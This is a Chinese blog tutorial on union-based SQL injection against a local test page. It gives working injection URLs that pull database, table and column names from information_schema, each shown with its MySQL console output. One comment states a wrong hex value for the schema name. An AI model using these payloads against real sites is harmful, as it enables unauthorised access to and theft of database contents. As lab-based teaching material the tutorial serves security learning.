/*
转载请注明出处,By:珍惜少年时
小知识,只是放在博客吃饭时无聊看看,大牛勿喷。
*/
珍惜少年时博客,专注网络安全 web渗透测试
00x1爆所有库:
mysql> select schema_name from information_schema.schemata;
+--------------------+
| schema_name |
+--------------------+
| information_schema |
| challenges |
| dvwa |
| mysql |
| performance_schema |
| phpcmsv9 |
| security |
| sqlinject |
| test |
| test_sqlinjection |
+--------------------+
10 rows in set (0.00 sec)
#该命令等价于show databases;
#所以sql语句为:
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(schema_name) from information_schema.schemata--
00x2爆所有表:
mysql> select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374;
+--------------------------+
| group_concat(table_name) |
+--------------------------+
| admin,user,user_a |
+--------------------------+
1 row in set (0.00 sec)
#注:
0x91916c696E6a656374为sqlinject库的16进制
#该命令等价于show tables;当然了,是在选择了数据库的情况下,也就是where哪里使用hex选择了的。
#所以sql语句为:
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374--
#可将其缩句为:select table_name from information_schema.tables
该sql语句可不选择数据库,直接爆所有的表。“列名”亦是如此。
00x3爆所有列:
mysql> select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374;
+----------------------------------------------------------------+
| group_concat(column_name) |
+----------------------------------------------------------------+
| id,username,password,id,username,password,id,username,password |
+----------------------------------------------------------------+
1 row in set (0.03 sec)
故语句为:
http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374--